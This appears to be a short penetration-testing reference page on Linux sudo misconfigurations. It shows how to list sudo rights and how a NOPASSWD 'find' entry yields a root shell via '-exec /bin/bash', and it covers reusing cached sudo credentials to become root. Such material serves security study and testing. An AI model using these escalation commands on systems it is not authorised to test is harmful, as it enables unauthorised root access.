var img = document.createElement('img'); img.src = "https://calabrone.net/piwik.php?idsite=2&rec=1&url=https://stinger.io" + location.pathname; img.style = "border:0"; img.alt = "tracker"; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(img,s);
Skip to main content

Sudo Access

Sudo permissions often lead to privilege escalation opportunities if misconfigured.

List Sudoers File

Check if user has sudo access:

sudo -l

Example output:

User user1 may run the following commands on this host:
    (ALL) NOPASSWD: /usr/bin/find
    (ALL) NOPASSWD: /usr/bin/ls

Abusable Sudo Permissions

If a user is allowed to run commands like find, ls, or others with NOPASSWD, this can be exploited.

An example of a command that can be escalated using find:

sudo /usr/bin/find / -exec /bin/bash \;

(This runs a bash shell with root privileges.)

Sudo Caching

Sudo will cache the users credentials for 5 minutes (by default). During this cached period, the user will not be required to enter the password again.

If sudo permissions are cached, it could be possible to run root commands without re-entering the password.

Verify cached credentials using the -v flag. If this command prompts to enter a password, then the credentials are no longer cached. If they are cached, running this command will restart the cache timer:

sudo -v

If sudo is cached, use the -i flag to become root:

sudo -i